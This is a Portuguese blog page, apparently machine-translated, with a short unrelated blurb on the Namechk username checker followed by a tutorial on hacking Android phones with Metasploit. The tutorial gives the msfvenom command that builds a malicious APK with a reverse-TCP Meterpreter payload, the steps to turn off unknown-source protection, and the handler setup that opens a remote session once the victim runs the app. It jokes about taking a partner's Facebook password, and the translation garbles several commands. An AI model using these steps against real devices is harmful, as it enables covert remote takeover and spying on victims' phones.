Pular para o conteúdo principal

Compartilhe

Namechk, você pode verificar a disponibilidade de um nome de usuário ou domínio em segundos.

Com o Namechk, você pode verificar a disponibilidade de um nome de usuário ou domínio em segundos. Existem 351 milhões de nomes de domínio registrados, e esse número continua crescendo. Todos os dias, milhares de novos nomes são registrados. Como os nomes de domínio só podem ser usados ​​por uma empresa ou pessoa por vez, pode ser difícil não apenas criar um nome de domínio que faça sentido, mas também encontrar um que esteja disponível.  Muita gente não quer perder tempo criando um novo nome de usuário, verificando a disponibilidade e registrando-o em cada plataforma. E se houvesse um jeito mais fácil? Existe. Um verificador e gerador de nomes de usuário como o Namechk  pode ajudar. Como funciona o Namechk? Comece com algumas ideias de nomes e digite cada uma delas na barra de pesquisa. O Namechk pega sua ideia de nome de usuário (mesmo palavras aleatórias) e verifica sua disponibilidade como nome de domínio e nome de usuário em dezenas de redes sociais e plataformas online. ...

Hackeando um smartphone Android

Hackeando um smartphone ou um tablet Android com o Metasploit

NB: Todas as informações contidas no artigo a seguir são apenas para fins educacionais, portanto, o autor não será responsabilizado pelo abuso de tais informações pelos usuários do site, se elas forem usadas para fins ilegais.
Nos guias anteriores do livro de endereços do Metasploit Framework , analisamos várias possibilidades de ação do software, concentrando-nos mais em ataques direcionados a PCs com Windows, exceto em alguns casos. Nos últimos anos, o mercado abriu suas portas para smartphones e tablets , dispositivos que rapidamente ganharam mais e mais popularidade, superando os pais de computadores acima de tudo com relação ao uso da rede.
Para um hacker, como para uma multinacional, deixar escapar essa fatia importante do mercado, seria ficar para trás com os tempos, sendo inevitavelmente destinado a sucumbir. É por esse motivo que neste tutorial eu quero re-propor o primeiro guia para o livro de endereços, revisitado em uma chave móvel .
O processo não difere muito do descrito acima, exceto por alguns passos em que a palavra Androidsubstituirá a palavra Windows.
Lembremo-nos de que, sendo puramente para fins de teste, este guia encontra muito poucas aplicações no mundo real. Além disso, em quantos você acha que eles podem iniciar um programa ou aplicativo que literalmente não serve para nada, se não para conceder acesso a estranhos ao seu dispositivo? A resposta a essa pergunta seria mais adequada para um ensaio sobre Engenharia Social do que sobre Exploração, então vamos nos concentrar em como obter acesso ao dispositivo móvel, e não em apropriação indébita da senha do Facebook do seu parceiro, sem esquecer o fato de que Uma vez que você tenha acesso remoto ao dispositivo, o resto será uma brisa.

Criar um apk infectado

Vamos começar criando um apk para instalar no dispositivo da vítima. Apk (Android Package) é a extensão que distingue os arquivos de aplicativos Android. Quanto aos executáveis ​​do Windows, o Metasploit também fornece o módulo de criação de arquivos apk. Em seguida, digite no terminal ou msfconsole o seguinte comando, que retornará um arquivo apk, pronto para ser baixado e instalado no dispositivo vítima.
  1. msfvenom -p androide / meterpreter / reverse_tcp LHOST = [ip_machine_attaching] LPORT = [porta_de_a_conexao] -o [nome do arquivo] .apk

Hacking Android Metasploit - Crie payloads de arquivos APK msfvenom
A carga está pronta, nós só temos que trazê-lo para o dispositivo móvel.

Ativar "Fontes desconhecidas" no Android

Aviso: o arquivo que contém a carga útil não está assinado, portanto, devemos desativar o controle das fontes de segurança para poder instalar o arquivo apk no dispositivo. Para fazer isso, vá para Configurações -> segurança e ative o item Fontes desconhecidas .
Ativar origens Android desconhecidas

Definir o manipulador

Uma vez que o controle das fontes seguras no dispositivo foi desativado, iniciamos o msfconsole com o comando msfconsole e definimos um manipulador android genérico
  1. usar exploit / multi / handler
  2. definir PAYLOAD android / meterpreter / reverse_tcp
  3. definir LHOST [ip_matting_attaching]
  4. defina LPORT [port_for_the_connection]
  5. corrida

Hacking Android Metasploit - Definir manipulador

Baixe e instale a carga útil

Vamos mover o dispositivo móvel, baixar o arquivo apk recém-criado e instalá-lo. Não tendo um dispositivo Android disponível, inclinei-me em uma máquina virtual.
Hacking Android Metasploit - Baixar apk
Hacking Android Metasploit - Instalar apk

Sucesso !!

Assim que a vítima inicia o aplicativo chamado MainActivity, o smartphone ou tablet está sob nosso controle
Hackeando o Android Metasploit - Start MainActivity
Hacking Android Metasploit - Meterpreter sysinfo
Graças ao artigo do Baty !

Comentários

Como usar um Agente OSINT IA

Pericia Digital

Ebook

Postagens mais visitadas